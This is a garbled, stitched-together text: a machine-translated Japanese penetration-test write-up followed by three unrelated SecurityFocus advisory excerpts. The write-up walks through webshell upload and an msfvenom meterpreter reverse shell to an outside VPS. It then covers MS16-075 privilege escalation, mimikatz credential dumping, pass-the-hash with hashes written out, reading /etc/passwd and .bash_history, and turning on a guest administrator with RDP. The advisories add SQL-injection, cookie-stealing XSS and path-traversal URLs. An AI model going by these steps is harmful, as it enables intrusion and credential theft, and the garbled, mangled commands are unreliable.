したがって、ターフール傍受の行動ルールは、ユーザーを追加できないが、既存のユーザーを管理者グループに追加することができ、ゲストユーザーをアクティブにすることができ、3389を開くことができるということです。このマシンに再びログインした後、シェルをリバウンドして戻ったり、パスワードを読んだりできませんでした。この時点で、私のジュニアは、ターコイズを直接オンにして保護をオフにできると言って、シェルをリバウンドできると言っていました。私？ その後、1回の操作の後にシェルを取得しましたが、それでもプレーンテキストのパスワードを読むことができませんでした。ハッシュを捨ててから爆破することを考えました。しかし、NTLMを解決できる外国のオンラインWebサイトがあることを覚えています https://www.objectif-securite.ch/ophcrack パスワードを取得した後、情報を収集するのはおなじみのライブラリであり、その後ライブラリがクラッシュします。 次に、XFTPがサーバー上にいくつかのサーバーのパスワードを保存したことがわかりました。この時点で、皮肉な操作を見つけました。 Asterisk Password Viewerツールを使用して、ここに保存されているパスワードを表示できます。 また、いくつかの根を許可したマシンについても言及したいと思います。後で試験をしたくありませんでした。収集したすべてのパスワードを記録し、ネットワークセグメント全体でマシンを押して、多くの弱いパスワードを引き起こしました。 残業してくれた情報センターの先生におめでとうございます。 0x04要約 1。ターゲットの古いシステムの[位置をアップロードする添付ファイルで、Trojanを直接アップロードしてアップロードされたパスに戻すことができます。 2。アリの剣を通してトロイの木馬を文章に接続した後、ファイルをアップロードすることはできません。包丁を介して文を接続すると、ファイルをアップロードできます。 3.パブリックネットワーク上のMSFを介してASPXバックドアを生成し、生成されたshell.aspxをマレーシアを介してターゲットサイトにアップロードし、shell.aspxにアクセスします。 msfvenom -p Windows/x64/meterpreter/reverse_tcp lhost=public vps lport=12345 -f aspx shell.aspx4。 MSFを聞き、リバウンドシェルムスフの使用Exploit/Multi/HandLermsf Exploit（Handler）Set Payload Windows/X64/MeterPreter/Reverse_TCPMSF Exploit（Handler）Set LHOST Public VPSMSF Exploit（Handler）Set LPort 12345MSF Exploit（Handler）Exploit5。包丁のコマンド端子を介してSystemInfoを介してパッチ情報出力情報を実行し、ローカルにダウンロードし、Windows-Exploit-Suggesterを使用して使用可能なエスカレーションPOCを使用して、MS16-075（オンライン比較:3http://BUGS.HACKING8.com/tiquan/）を見つけることができます） https://github.com/1nf1n17yk1ng/windows-exploit-suggesterpython3systeminfo info.txtpython3 windows-exploit-suggester.py -updatepython3 windows-exploit-suggester.py -database 2021-07-15-msb.xls-systeminfp MSF（https://github.com/secwiki/windows-kernel-exploits/tree/master/MS16-075）でMS16-075が通過しました。 C: \ uses \ publicMeterPreter CD C: \ uses \ publicMeterpreter suse incognitemerpreter list_tokens -umeterpreter execute -ch -f ./potato.exemeterpreter list_tokens -umeterpreter getuidserver username: nt authority \ system7。 MIMIKATZをMSFからロードして、プレーンテキストとハッシュバリューメータープレターを読み取るためにMimikatz_Command -f Samdump33:336033603360336033603360HASSETER -PRETER -F SEKURLSA3:3:SEACHWORDSMETERSMETRETER MSTGET METEXTETECTEXTEXTEXTETMETSMETSMETRETER -MSGTETMETSMETRETER -MSGETMETSMETSMERTERTERTERTER 8。PTHパスのバッチハッシュ値衝突ライブラリ MeterPreter Upload/Root/CrackMapexec C: \ Users \ PublicMeterPreter CrackMapexec 192.168.1.0/24 -u管理者-H CCEF208C64485269C20DB2CAD21734FE7またはメーターペリターバックグラウンドWindows/MeterPreter/Reverse_tcpmsfset lhost 192.168.232.128msfset lport 2222msfset rhosts 10.206.14.1/24msfset smbuser administratorsmbuser=administrationmbuser set smbpass E52CAC67419A9A9A224A3B108F3FA6CB6D:8846F7EEEE8FB117AD06BDD830B7586CMSF RUNまたはMSF使用SMBPASS AAD3B435B51404EEAAD3B435B51404EE:579110C49145015C47ECD267657D3174（LMハッシュは32ビット文字になる可能性があることに注意してください）MSF Run4。ターゲットの新しいシステムでファイルのダウンロードを見つけました。ファイルのダウンロードの脆弱性があるかもしれません。ここでは、BPの侵入者機能を介してファズをバッチできます。ここでは、最初に/etc/passwdなどを読み取り、ハッシュ値を読んで、md5を通してそれを割ることができます。 5.次に、任意のファイルを介してダウンロードして、 /root /.bash_histoyを読み取り、コンプレッションのためにWebサイトディレクトリの管理者の操作を表示します。 Webサイトに保存された圧縮パッケージ名とルートディレクトリがダウンロードされ、ソースコードが直接ダウンロードされてバックアップされます。 6. Oracleデータベース構成ファイルはソースコードで見つかり、ユーザー名システムとパスワードが漏れ、IPアドレスは121.1.100.100が漏れました。デフォルトのSID値：ORCLを使用すると、接続できます。ここでは、Oracleshellを使用してリモートで接続します。 7.ネットユーザー名を追加するコマンドはOracleshellを介してインターセプトされ、タスクリスト/SVCが実行され、ターゲットデータベースにTinderがあることがわかります。ただし、突風アカウントをアクティブにし、管理者グループに突風を追加することにより、ターフはそれを傍受しません。その後、3389をオンにして、ネットユーザーゲスト /Active:YESNETユーザーゲストテスト@123NETローカルグループ管理者ゲスト /addreg \ currentControlset \ control \ターミナル ''サーバー /v fdenytsconnections /t reg_dword /d dual; sからのstdoutとしてのosexec（ 'ipconfig'）

source: https://www.securityfocus.com/bid/52781/info EasyPHP is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/home/sqlite/main.php?dbsel=1&table=t1'

source: https://www.securityfocus.com/bid/52768/info ocPortal is prone to multiple cross-site scripting vulnerabilities and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information. ocPortal versions prior to 7.1.6 are vulnerable. http://www.example.com/code_editor.php?path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/code_editor.php?path&line=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/site/catalogue_file.php?original_filename=1.txt&file=%252e%252e%252f%252e%252e%252finfo.php

source: https://www.securityfocus.com/bid/52819/info PHP Designer 2007 - Personal is prone multiple SQL-injection vulnerabilities. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/read_news.php?news_id=[Sqli] http://www.example.com/announce.php?id=[Sqli]